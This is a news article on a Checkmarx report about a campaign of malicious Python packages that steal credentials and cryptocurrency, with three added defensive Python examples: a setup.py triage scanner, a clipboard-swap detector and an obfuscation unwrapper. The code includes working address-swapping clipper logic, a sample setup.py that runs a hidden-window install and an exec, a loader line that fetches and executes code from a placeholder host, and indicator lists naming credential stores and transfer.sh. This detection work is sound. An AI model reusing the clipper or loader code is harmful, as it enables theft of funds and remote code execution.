A threat actor has been delivering a “relentless campaign” since early April to seed the software supply chain with hundreds of malicious Python packages aimed at stealing sensitive data and cryptocurrency from Windows systems.
The packages, delivered via various usernames on GitHub, have been downloaded nearly 75,000 times already, researchers from Checkmarx revealed in a blog post this week. They also cast a wide net in terms of the information they collect: the malware can steal data from the target system, from a range of applications and browsers, and about the users themselves.
Further, the campaign has what appears to be a lucrative monetization aspect: It targets cryptocurrency users by modifying crypto addresses to redirect transactions to the attacker, according to Checkmarx. In fact, one of the crypto wallet addresses accepting these transactions showed a six-figure amount during the time period that the malicious packages were active.
“The sheer volume and persistence of these deployments hinted at an attacker with a well-crafted agenda,” Checkmarx security researcher Yehuda Gelb wrote in the post.
Moreover, the attacker has steadily increased the sophistication of the packages, moving from plaintext code to encryption to multilayered obfuscation, and most recently to secondary payloads fetched at run time.
“The threat actors’ most recent packages adeptly dismantle system defenses, leaving it exposed and vulnerable,” Gelb wrote.
Multiphase Evolution
The attacker employed a multiphase attack sequence, reflected in the activity of the malicious packages as they evolved since they initially appeared in early April.
In the beginning, the packages, written in plaintext, “were deceptively transparent,” according to Gelb. They “would subtly integrate themselves into unsuspecting systems, all the while laying the groundwork for their malicious endeavors,” he wrote.
That activity began with a quiet installation of dependencies, launched in a subprocess configured so that no console window surfaces to alert the user, followed by checks of the environment so the malware could stop at the first sign of analysis or detection.
Once that setup was complete, the packages set about their real task of collecting data from the infected system, extracting usernames, passwords, browsing history, cookies, and payment information from the Opera, Chrome, Microsoft Edge, Brave, and Yandex browsers. They also harvested data from applications including Atomic, Exodus, Steam, and NationsGlory, packaging it into ZIP files before exfiltrating it.
Other capabilities of the packages during this initial phase included a search of the user’s directories for potentially valuable files and subsequent upload of finds to hxxps[:]//transfer[.]sh; theft of badges, phone numbers, email addresses, and more from Discord as well as from popular gaming platforms such as Minecraft and Roblox; and screenshot-capture to track real-time user activity.
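The first-phase behaviors above (pip installs at import time, suppressed console windows, Chromium credential databases, wallet and Discord data, transfer.sh uploads, screenshots, clipboard access) are all visible in a package's source before anything is installed. The following is an added example, not Checkmarx's tooling: a static triage of a setup.py that flags those indicators and lists every call that would run at module top level, i.e. the moment pip builds the package. The indicator list is a starting point and the sample setup.py is constructed for illustration.

```python
"""Static triage of a package's setup.py for the indicators described above.
Added example, not Checkmarx's tooling; the indicator list is a starting
point and SAMPLE_SETUP_PY is constructed for illustration."""
import ast
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    indicator: str
    line: int
    evidence: str


# (name, regex applied to each source line). Case-insensitive where Windows
# file-system paths are involved, since those are.
INDICATORS = [
    ("hidden-console", re.compile(r"CREATE_NO_WINDOW|SW_HIDE|STARTF_USESHOWWINDOW|creationflags\s*=")),
    ("pip-install-at-import", re.compile(r"subprocess\.\w+\(.*\bpip\b.*install")),
    ("browser-credential-db", re.compile(r"Login Data|Web Data|Cookies|Local State|os_crypt", re.I)),
    ("chromium-profile-path", re.compile(r"Google\\Chrome|BraveSoftware|Microsoft\\Edge|Opera Software|Yandex", re.I)),
    ("wallet-or-game-data", re.compile(r"\b(Exodus|atomic|Steam|NationsGlory)\b", re.I)),
    ("discord-data", re.compile(r"discord.*(token|leveldb|Local Storage)", re.I)),
    ("anonymous-file-host", re.compile(r"https?://transfer\.sh", re.I)),
    ("screenshot", re.compile(r"ImageGrab\.grab|pyautogui\.screenshot")),
    ("clipboard-access", re.compile(r"pyperclip|win32clipboard|GetClipboardData")),
    ("dynamic-exec", re.compile(r"\bexec\(|\beval\(|__import__\(|b64decode\(|marshal\.loads\(")),
]

# Constructed sample: a setup.py that does real work before setup() is ever
# reached. 0x08000000 is CREATE_NO_WINDOW on Windows.
SAMPLE_SETUP_PY = r'''
import base64, os, subprocess
from setuptools import setup

subprocess.Popen(["pip", "install", "pyperclip", "requests"],
                 creationflags=0x08000000)  # CREATE_NO_WINDOW
LOGIN_DB = os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data")
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))  # decodes to print('hi') in this sample

setup(name="requests-utilz", version="0.1", py_modules=[])
'''


def scan_source(source: str) -> list[Finding]:
    """Run every indicator regex over every line; return all hits."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS:
            match = pattern.search(line)
            if match:
                findings.append(Finding(name, lineno, match.group(0)))
    return findings


def install_time_calls(source: str) -> list[str]:
    """Dotted names of calls made at module top level, i.e. code that runs as
    soon as pip builds the package. Anything other than setup()/find_packages()
    deserves a manual look."""
    calls = []
    for node in ast.parse(source).body:
        value = getattr(node, "value", None)
        if isinstance(node, (ast.Expr, ast.Assign)) and isinstance(value, ast.Call):
            calls.append(ast.unparse(value.func))
    return [c for c in calls if c.rsplit(".", 1)[-1] not in {"setup", "find_packages"}]


def triage(source: str) -> dict:
    findings = scan_source(source)
    return {
        "indicators": sorted({f.indicator for f in findings}),
        "findings": findings,
        "install_time_calls": install_time_calls(source),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_SETUP_PY)
    for f in report["findings"]:
        print(f"line {f.line:>3}  {f.indicator:<24} {f.evidence}")
    print("top-level calls:", report["install_time_calls"])
```

Run it against the unpacked sdist (`pip download --no-deps --no-binary :all: <name>` and extract) rather than against an installed copy, since by then the top-level code has already run. The regexes will produce false positives on legitimate Windows tooling; the point is to surface what to read, not to render a verdict.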
Crypto Heist and Evasive Tactics
The cryptocurrency element was also a hallmark of the first phase of the attacks. Malware spread through the packages would track the user’s clipboard, scanning for cryptocurrency addresses so they could be replaced with the attacker’s own.
“Similar crypto addresses were found across the myriad of malicious packages hinting at a centralized strategy, channeling the redirected funds into a few primary collection points,” Gelb noted.
The packages didn’t stop there, but also would tamper with applications such as Exodus — a crypto wallet management app — to alter its core files to enable “unrestricted data exfiltration,” he wrote.
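The clipboard swap described above is what analysts call a clipper: the malware polls the clipboard, recognises a cryptocurrency address by its format, and writes the attacker's address of the same coin back. Below is an added example, not Checkmarx's or the attacker's code, showing that logic beside a heuristic that detects it: an address replaced by a different address of the same family within a couple of seconds. The address formats are the public Bitcoin, Ethereum and Litecoin ones (syntax only, no checksum validation); every address value and the clipboard timeline are constructed.

```python
"""Clipboard clipper logic and a heuristic detector for it. Added example,
not Checkmarx's or the attacker's code; all address values and the clipboard
timeline are constructed."""
import re
from dataclasses import dataclass

# Syntactic address families. Base58 excludes 0, O, I and l; bech32 excludes
# 1, b, i and o after the separator. No checksum validation is performed.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc-bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{25,62}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "ltc": re.compile(r"^(ltc1[ac-hj-np-z02-9]{25,62}|[LM][a-km-zA-HJ-NP-Z1-9]{26,33})$"),
}


def address_family(text: str):
    """Return the family name for an address-shaped string, else None."""
    text = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return family
    return None


def clipper_rewrite(text: str, attacker: dict) -> str:
    """What the malware does on each clipboard change: if the content is an
    address of a family the attacker holds a wallet for, swap it."""
    family = address_family(text)
    if family in attacker and text.strip() != attacker[family]:
        return attacker[family]
    return text


@dataclass(frozen=True)
class Swap:
    at: float
    family: str
    before: str
    after: str


def detect_clipper_swaps(events, window: float = 2.0) -> list[Swap]:
    """Flag an address replaced by a *different* address of the same family
    within `window` seconds. events is a list of (time_seconds, content)."""
    alerts = []
    for (t0, before), (t1, after) in zip(events, events[1:]):
        fam = address_family(before)
        if (fam and fam == address_family(after)
                and before.strip() != after.strip() and 0 <= t1 - t0 <= window):
            alerts.append(Swap(t1, fam, before, after))
    return alerts


def simulate(user_copies, attacker, swap_delay: float = 0.3):
    """Build the clipboard timeline an infected host would show: each user
    copy, followed (when the clipper fires) by the attacker's replacement."""
    events = []
    for t, text in user_copies:
        events.append((t, text))
        swapped = clipper_rewrite(text, attacker)
        if swapped != text:
            events.append((t + swap_delay, swapped))
    return events


# Constructed values; none of these are real funded addresses.
USER_ETH = "0x1111222233334444555566667777888899990000"
ATTACKER_ETH = "0x" + "deadbeef" + "0" * 31 + "1"
ATTACKER = {"eth": ATTACKER_ETH}           # attacker holds an ETH wallet only
USER_BTC_1 = "1A2B3C4D5E6F7G8H9J1K2M3N4P5Q6R7S8T"
USER_BTC_2 = "3Z9Y8X7W6V5U4T3S2R1Q9P8N7M6K5J4H3G2"

USER_COPIES = [
    (0.0, "meeting notes for Monday"),
    (5.0, USER_ETH),                        # recipient address: clipper fires
    (20.0, "https://example.invalid/invoice"),
    (30.0, USER_BTC_1),                     # no BTC wallet configured: untouched
    (45.0, USER_BTC_2),                     # user's own second copy, 15 s later: not flagged
]

if __name__ == "__main__":
    timeline = simulate(USER_COPIES, ATTACKER)
    for alert in detect_clipper_swaps(timeline):
        print(f"t={alert.at:.1f}s {alert.family}: {alert.before} -> {alert.after}")
```

On a real Windows host the (time, content) pairs would come from polling the clipboard (for example via `win32clipboard`), and the heuristic will also fire when a user pastes two addresses of the same coin within the window, so treat it as a trigger for a look at which process last wrote the clipboard rather than as proof on its own.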
After the first wave, the attacker began encrypting code that the earlier packages had shipped as plaintext. The packages released over the summer months were therefore harder to inspect for malicious functionality, though at their core the behavior stayed the same.
The most recent packages took these deceptive practices further still, burying the code under dozens of layers of obfuscation that also concealed secondary payloads fetched from an external source.
Further, additional payloads included in the latest packages significantly extended the data collection and exfiltration capabilities of earlier packages, as well as included further evasion tactics that could prevent users from downloading antivirus software or checking files for viruses.
The attacker also added the ability to steal data from Telegram and to pilfer cryptocurrency wallets, system information, antivirus details, the running task list, Wi-Fi passwords, clipboard data, and specific files from directories such as Desktop, Pictures, Documents, Music, Videos, and Downloads directly from the targeted machine, according to the researchers.
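Stacked layers of the kind described in the two paragraphs above (encoded blobs handed to exec(), each revealing another one) can usually be peeled statically, without running any of the sample. The following is an added example, not Checkmarx's tooling. The article gives no detail of the campaign's encoding, so `wrap_layers` builds a constructed stand-in (zlib inside alternating base64/base32 around an exec()), and `unwrap` evaluates only whitelisted decoders over constants, stopping the moment an exec() argument is anything else, such as the network fetch of a second-stage payload.

```python
"""Peel nested exec(decode(...)) layers statically, never executing the
sample. Added example, not Checkmarx's tooling; the wrapping scheme in
wrap_layers and the STAGE2_LOADER inner payload are constructed stand-ins,
not the campaign's actual encoding."""
import ast
import base64
import re
import zlib

# Decoders we are willing to evaluate on the analyst's machine. Anything else
# in an exec() argument (a network fetch, a lambda, a XOR loop) stops the
# unwrapper and is left for manual review.
SAFE_FUNCS = {
    "base64.b64decode": base64.b64decode,
    "base64.b32decode": base64.b32decode,
    "base64.b16decode": base64.b16decode,
    "zlib.decompress": zlib.decompress,
    "bytes.fromhex": bytes.fromhex,
}


class UnsafeExpression(Exception):
    """The exec() argument is not a pure decode chain over a constant."""


def _dotted(node):
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def safe_eval(node):
    """Evaluate constants, whitelisted decoder calls, and .decode()/.encode()
    on their results. Everything else raises UnsafeExpression."""
    if isinstance(node, ast.Constant):
        return node.value
    if isinstance(node, ast.Call) and not node.keywords:
        args = [safe_eval(a) for a in node.args]
        name = _dotted(node.func)
        if name in SAFE_FUNCS:
            return SAFE_FUNCS[name](*args)
        if isinstance(node.func, ast.Attribute) and node.func.attr in ("decode", "encode"):
            receiver = safe_eval(node.func.value)
            return getattr(receiver, node.func.attr)(*args)
    raise UnsafeExpression(ast.unparse(node)[:80])


def _first_exec(tree):
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval") and node.args):
            return node
    return None


def unwrap(source: str, max_layers: int = 200):
    """Return (innermost_source, layers_peeled, stopped_on). stopped_on is None
    when no exec() remains, else the expression that could not be evaluated."""
    for layer in range(max_layers):
        call = _first_exec(ast.parse(source))
        if call is None:
            return source, layer, None
        try:
            payload = safe_eval(call.args[0])
        except UnsafeExpression as exc:
            return source, layer, str(exc)
        if isinstance(payload, bytes):
            payload = payload.decode("utf-8", errors="replace")
        source = payload
    raise RuntimeError(f"more than {max_layers} layers; giving up")


URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_urls(source: str) -> list[str]:
    return URL_RE.findall(source)


def wrap_layers(payload: str, layers: int) -> str:
    """Constructed stand-in sample: each layer zlib-compresses the previous one
    and wraps it in exec(), alternating base64 and base32 so the unwrapper has
    to read the decoder from the code rather than assume one."""
    src = payload
    for i in range(layers):
        blob = zlib.compress(src.encode())
        if i % 2:
            enc, fn = base64.b32encode(blob), "base64.b32decode"
        else:
            enc, fn = base64.b64encode(blob), "base64.b64decode"
        src = f"import base64, zlib\nexec(zlib.decompress({fn}({enc!r})).decode())\n"
    return src


# Constructed innermost stage: fetches a second payload from a reserved,
# non-resolving host, exactly the step the unwrapper must refuse to perform.
STAGE2_LOADER = (
    "import urllib.request\n"
    'exec(urllib.request.urlopen("https://example.invalid/stage2.py").read())\n'
)


def analyse(sample: str) -> dict:
    inner, layers, stopped_on = unwrap(sample)
    return {"layers": layers, "stopped_on": stopped_on,
            "urls": extract_urls(inner), "inner": inner}


if __name__ == "__main__":
    report = analyse(wrap_layers(STAGE2_LOADER, 40))
    print(f"peeled {report['layers']} layers; stopped on: {report['stopped_on']}")
    print("embedded URLs:", report["urls"])
    print(report["inner"])
```

The whitelist is the safety boundary: a sample that reaches for `marshal.loads`, a string-building loop, or `urllib` is reported rather than evaluated, and the recovered innermost layer plus its URLs go into the indicator list for the package.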
Beware Suspicious Packages
Threat actors increasingly are recognizing the value of weaponizing open source packages as a way to target the software supply chain and thus reach an enormous target base with significantly less effort than other types of attacks can require.
Python, given its widespread use in software development, is an especially popular target for attackers, who have gone so far as to poison entire projects written in the language.
Indeed, malware distribution through open source packages is an ongoing threat, one that requires organizations to maintain “constant vigilance and adaptability to effectively protect against it,” Gelb wrote.
The discovery of the recent Python campaign, in which the attacker constantly evolved to evade detection, highlights how important it is both for security professionals to share open source threat intelligence, and for developers to carefully vet any packages they download, particularly when they come from untrusted sources.